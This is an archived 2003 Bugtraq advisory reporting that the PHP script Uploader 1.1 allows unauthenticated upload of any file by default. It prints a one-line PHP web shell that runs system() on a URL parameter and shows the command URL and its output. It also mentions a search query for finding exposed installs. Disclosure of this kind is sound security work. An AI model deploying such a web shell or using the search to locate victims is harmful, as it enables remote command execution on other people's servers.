lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 4 Mar 2003 01:15:47 +0100 (MET) From: kingcope@....net To: bugtraq@...urityfocus.com Subject: uploader.php vulnerability Uploader Version 1.1 which is available from http://www.phpscriptcenter.com/uploader.php includes "uploader.php", which lets you upload ANY file (even scripts eg. in PHP) onto the server if no password protection is specified in the configuration file (default set to off). The supplied files will be uploaded into directory "uploads" if not otherwise configured. So if we create a file like this: <?php $cmd = $_GET["cmd"]; system("$cmd"); ?> and upload it as "shellemul.php", we can execute commands by targeting our browser to http://www.victim.com/uploads/shellemul.php?cmd=id which will give us --> uid=48(apache) gid=48(apache) groups=48(apache) We could even upload PHPShell and have more comfortable fun. --- Google gets me 411 hits for "allinurl: uploader.php" --- by kcope (kingcope@....net) -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
Powered by blists - more mailing lists